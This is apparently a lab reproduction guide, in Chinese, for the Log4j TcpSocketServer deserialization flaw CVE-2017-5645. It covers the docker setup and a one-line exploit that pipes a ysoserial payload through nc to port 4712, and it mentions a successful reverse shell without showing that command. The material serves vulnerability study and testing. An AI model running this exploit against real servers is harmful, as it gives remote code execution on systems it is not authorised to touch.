Apache Log4j Server 反序列化命令執行漏洞（CVE-2017-5645）

Path log4j/CVE-2017-5645

Apache Log4j是一個用于Java的日志記錄庫，其支持啟動遠程日志服務器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻擊者可利用該漏洞執行任意代碼。

漏洞環境

執行如下命令啟動漏洞環境

docker-compose up -d

環境啟動后，將在4712端口開啟一個TCPServer。

說一下，除了使用vulhub的docker鏡像搭建環境外，我們下載了log4j的jar文件后可以直接在命令行啟動這個TCPServer：java -cp "log4j-api-2.8.1.jar:log4j-core-2.8.1.jar:jcommander-1.72.jar" org.apache.logging.log4j.core.net.server.TcpSocketServer，無需使用vulhub和編寫代碼。

漏洞復現

我們使用ysoserial生成payload，然后直接發送給your-ip:4712端口即可。

java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712

然后執行docker-compose exec log4j bash進入容器，可見 /tmp/success 已成功創建：

執行反彈shell的命令，成功彈回shell：